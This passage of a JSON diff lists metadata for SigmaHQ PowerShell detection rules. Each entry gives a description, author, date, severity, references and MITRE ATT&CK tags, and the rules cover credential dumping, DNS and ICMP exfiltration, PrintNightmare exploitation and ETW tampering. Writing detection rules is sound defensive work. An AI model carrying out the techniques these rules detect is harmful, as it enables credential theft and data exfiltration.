"logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "value": "Execution via CL_Mutexverifiers.ps1" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", + "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" + }, + { + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cmdlet_scheduled_task.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", + "value": "Powershell Create Scheduled Task" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "posh_ps_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "db885529-903f-4c5d-9864-28fe199e6370", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell" + }, + { + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_copy_item_system_directory.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "value": "Powershell Install a DLL in System Directory" + }, + { + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_cor_profiler.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.012" + ] + }, + "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", + "value": "Registry-Free Process Scope COR_PROFILER" + }, + { + "description": "Detects creation of a local user via PowerShell", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/04/11", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "posh_ps_create_local_user.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "value": "PowerShell Create Local User" + }, + { + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "meta": { + "author": "frack113", + "creation_date": "2022/01/12", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_create_volume_shadow_copy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "value": "Create Volume Shadow Copy with Powershell" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if archive operations are done via PowerShell." + ], + "filename": "posh_ps_data_compressed.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560" + ] + }, + "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "value": "Data Compressed - PowerShell" + }, + { + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "meta": { + "author": "frack113, Duc.Le-GTSC", + "creation_date": "2021/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_detect_vm_env.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1497.001" + ] + }, + "uuid": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "value": "Powershell Detect Virtualization Environment" + }, + { + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "meta": { + "author": "frack113", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_directorysearcher.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "value": "DirectorySearcher Powershell Exploitation" + }, + { + "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.002" + ] + }, + "uuid": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "value": "Manipulation of User Computer or Group Security Principals Across AD" + }, + { + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "meta": { + "author": "Ali Alwashali", + "creation_date": "2022/08/21", + "falsepositive": [ + "Legitimate script that disables the command history" + ], + "filename": "posh_ps_disable_psreadline_command_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DissectMalware/status/1062879286749773824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "602f5669-6927-4688-84db-0d4b7afb2150", + "value": "Disable Powershell Command History" + }, + { + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_disable_windowsoptionalfeature.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "value": "Disable-WindowsOptionalFeature Command PowerShell" + }, + { + "description": "Dnscat exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + ], + "filename": "posh_ps_dnscat_execution.yml", + "level": "critical", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "value": "Dnscat Execution" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_dump_password_windows_credential_manager.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "value": "Dump Credentials from Windows Credential Manager With PowerShell" + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_enable_psremoting.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", + "value": "Enable Windows Remote Management" + }, + { + "description": "Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "meta": { + "author": "frack113", + "creation_date": "2022/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_enable_windowsoptionalfeature.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "55c925c1-7195-426b-a136-a9396800e29b", + "value": "Enable-WindowsOptionalFeature Command PowerShell" + }, + { + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "603c6630-5225-49c1-8047-26c964553e0e", + "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" + }, + { + "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_etw_trace_evasion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ] + }, + "uuid": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "value": "Disable of ETW Trace - Powershell" + }, + { + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Legitimate usage of the cmdlet to forward emails" + ], + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "value": "Suspicious PowerShell Mailbox SMTP Forward Rule" + }, + { + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_file_and_directory_discovery.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "value": "Powershell File and Directory Discovery" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_get_acl_service.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ] + }, + "uuid": "95afc12e-3cbb-40c3-9340-84a032e596a3", + "value": "Service Registry Permissions Weakness Check" + }, + { + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_adcomputer.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "value": "Active Directory Computers Enumeration with Get-AdComputer" + }, + { + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_adgroup.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002" + ] + }, + "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", + "value": "Active Directory Group Enumeration With Get-AdGroup" + }, + { + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_get_adreplaccount.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ] + }, + "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "value": "Suspicious Get-ADReplAccount" + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_childitem_bookmarks.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", + "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" + }, + { + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate administration scripts" + ], + "filename": "posh_ps_hotfix_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", + "value": "PowerShell Hotfix Enumeration" + }, + { + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Legitimate usage of System.Net.NetworkInformation.Ping class" + ], + "filename": "posh_ps_icmp_exfiltration.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_icmp_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "value": "PowerShell ICMP Exfiltration" + }, + { + "description": "Detects powershell scripts that import modules from suspicious directories", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_import_module_susp_dirs.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "value": "Import PowerShell Modules From Suspicious Directories" + }, + { + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_invoke_command_remote.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "value": "Execute Invoke-command on Remote Host" + }, + { + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_invoke_dnsexfiltration.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/Arno0x/DNSExfiltrator", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "value": "Powershell DNSExfiltration" + }, + { + "description": "Detects Commandlet name for PrintNightmare exploitation.", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_nightmare.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", + "value": "PrintNightmare Powershell Exploitation" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", + "level": "high", + "logsource.category": "ps_script", + 